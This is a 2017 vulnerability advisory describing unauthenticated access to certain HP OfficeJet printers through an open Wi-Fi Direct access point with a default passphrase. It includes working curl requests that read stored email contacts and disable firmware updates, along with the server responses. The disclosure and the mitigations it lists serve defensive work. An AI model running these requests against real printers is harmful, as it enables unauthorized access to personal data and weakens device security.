HP Printers Wi-Fi Direct Improper Access Control
--------------------------------------------------------------------------------
1. Advisory Information
Title: HP Printers Wi-Fi Improper Access Control
Advisory ID: NESESO-2017-0111
Advisory URL: http://neseso.com/advisories/NESESO-2017-0111.pdf
Date published: 2017-02-01
Date of last update: 2017-02-01
Vendors contacted: Hewlett Packard
Release mode: User Release
--------------------------------------------------------------------------------
2. Vulnerability Information
Class: Configuration [CWE-16], Improper Access Control [CWE-284]
Impact: Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
--------------------------------------------------------------------------------
3. Vulnerability Description
HP printers with Wi-Fi Direct support, let you print from a mobile device
directly to the printer without connecting to a wireless network. Several of
these printers are prone to a security vulnerability that allows an external
system to obtain unrestricted remote read/write access to the printer
configuration using the embedded web server.
--------------------------------------------------------------------------------
4. Vulnerable Packages
HP OfficeJet Pro 8710 firmware version WBP2CN1619BR
HP OfficeJet Pro 8620 firmware version FDP1CN1547AR
Other products and versions might be affected too, but they were not tested.
--------------------------------------------------------------------------------
5. Vendor Information, Solutions and Workarounds
There was no official answer from HP Inc. after several attempts (see [Sec. 8]);
contact vendor for further information.
Some mitigation actions may be:
• Disable Wi-Fi Direct functionality to protect your device.
• Enable Password Settings on the Embedded Web Server.
--------------------------------------------------------------------------------
6. Credits
This vulnerability was discovered and researched by a member from Neseso
Research Team.
--------------------------------------------------------------------------------
7. Technical Description
Wi-Fi Direct Improper Access Control
Wi-Fi Direct [1], initially called Wi-Fi P2P, is a Wi-Fi standard enabling
devices to easily connect with each other without requiring a wireless access
point. It is useful for everything from internet browsing to file transfer, and
to communicate with one or more devices simultaneously at typical Wi-Fi speeds.
In a scenario where two devices want to connect they can authenticate using
methods such as PIN, Push-Button or NFC.
HP Printers implement Wi-Fi Direct[2] support in two ways, one as described on
the Wi-Fi Direct specification and the other providing a wi-fi access point that
has no security or uses insecure default credentials (12345678 passphrase is
used by default on newer models). Giving access to anyone that is near enough
to establish a Wi-Fi connection without any user interaction or notification.
The second vulnerability is that the printing services and others, such as the
Embedded Web Server has no authentication by default which gives anyone the
ability to not only access sensitive information but also modify device
configuration. These two vulnerabilities exposes user information and gives
unrestricted remote read/write access to the configuration and services of the
printer.
Below two examples of HTTP requests that attackers could use to access emails
stored on the device or disable automatic firmware updates.
$ curl -v --insecure https://192.168.223.1/DevMgmt/Email/Contacts
* Trying 192.168.223.1...
* Connected to 192.168.223.1 (192.168.223.1) port 443 (#0)
* TLS 1.2 connection using TLS_RSA_WITH_AES_256_CBC_SHA256
* Server certificate: HP16B465
GET /DevMgmt/Email/Contacts HTTP/1.1
Host: 192.168.223.1
User-Agent: curl/7.43.0
Accept: */*
< HTTP/1.1 200 OK
< Server: HP HTTP Server; HP HP OfficeJet Pro 8710 - D9L18A; Serial Number:
XXXXXXXXXX; Built:Wed May 11, 2016 03:44:38PM {WBP2CN1619BR}
< Content-Type: text/xml
< Content-Length: 203
< Cache-Control: must-revalidate, max-age=0
< Pragma: no-cache
<
* Connection #0 to host 192.168.1.17 left intact
<emaildyn:EmailContacts xmlns:dd="http://www.hp.com/schemas/imaging/con/dictiona
ries/1.0/" xmlns:emaildyn="http://www.hp.com/schemas/imaging/con/ledm/emailservi
cedyn/2010/11/22"></emaildyn:EmailContacts>
$ cat data.xml
<?xml version="1.0" encoding="UTF-8"?>
<fwudyn:FirmwareUpdateConfig xsi:schemaLocation="http://www.hp.com/schemas/imagi
ng/con/ledm/firmwareupdatedyn/2010/12/12 ../../schemas/FirmwareUpdateDyn.xsd" xm
lns:fwudyn="http://www.hp.com/schemas/imaging/con/ledm/firmwareupdatedyn/2010/12
/12" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance";>
<fwudyn:AutomaticCheck>disabled</fwudyn:AutomaticCheck>
<fwudyn:AutomaticUpdate>disabled</fwudyn:AutomaticUpdate>
</fwudyn:FirmwareUpdateConfig>
$ curl -v -X PUT --insecure -d @data.xml https://192.168.223.1/FirmwareUpdate/We
bFWUpdate/Config --header "Content-Type:text/xml"
* Trying 192.168.223.1...
* Connected to 192.168.223.1 (192.168.223.1) port 443 (#0)
* TLS 1.2 connection using TLS_RSA_WITH_AES_256_CBC_SHA256
* Server certificate: HP16B465
PUT /FirmwareUpdate/WebFWUpdate/Config HTTP/1.1
Host: 192.168.223.1
User-Agent: curl/7.43.0
Accept: */*
Content-Type:text/xml
Content-Length: 487
* upload completely sent off: 487 out of 487 bytes
< HTTP/1.1 200 OK
< Server: HP HTTP Server; HP HP OfficeJet Pro 8710 - D9L18A; Serial Number: XXXXXXXXX; Built:Wed May 11, 2016
03:44:38PM {WBP2CN1619BR}
< Content-Length: 0
< Cache-Control: must-revalidate, max-age=0
< Pragma: no-cache
<
* Connection #0 to host 192.168.223.1 left intact
Attackers can do other attacks such as setting a proxy, doing configuration
backups, getting network information among others.
--------------------------------------------------------------------------------
8. Report Timeline
2017-01-11: Neseso attempted to contact HP Inc. security contact.
2017-01-13: Neseso attempted to contact HP Inc. security contact.
2017-01-16: Neseso attempted to contact HP Inc. security contact for third time
using the web form to report vulnerabilities on Hewlett Packard
Enterprise site.
2017-01-17: HP Enterprise contact reply that printers vulnerabilities must be
reported to contact HP Inc.
2017-01-17: Neseso asked HP Enterprise if there is other security contact for HP
Inc. besides the one used before.
2017-01-17: HP Enterprise security contact replied that the security contact for
HP Inc. is correct and we should contact them.
2017-01-17: Neseso attempted for fourth time to contact HP Inc. security
contact.
2017-01-23: Neseso notifies that if the vendor refuses to response the advisory
will be released on February 1st, 2017.
2017-01-26: Neseso informed HP Inc. that it is their last chance to answer the
emails, if not the advisory was going to be released on February
1st, 2017.
2017-02-01: Advisory NESESO-2017-0111 published as 'user release'.
--------------------------------------------------------------------------------
9. References
[1] - http://www.wi-fi.org/discover-wi-fi/wi-fi-direct
[2] - http://www8.hp.com/us/en/ads/mobility/wireless-direct-printing.html
--------------------------------------------------------------------------------
10. About Neseso
Neseso is an independent security consulting company with more than 10 years of
experience in security research and vulnerability assessment.
--------------------------------------------------------------------------------
11. Copyright Notice
The contents of this advisory are copyright (c) 2016 Neseso and are licensed
under a Creative Commons Attribution Non-Commercial Share-Alike 4.0 License:
http://creativecommons.org/licenses/by-nc-sa/4.0/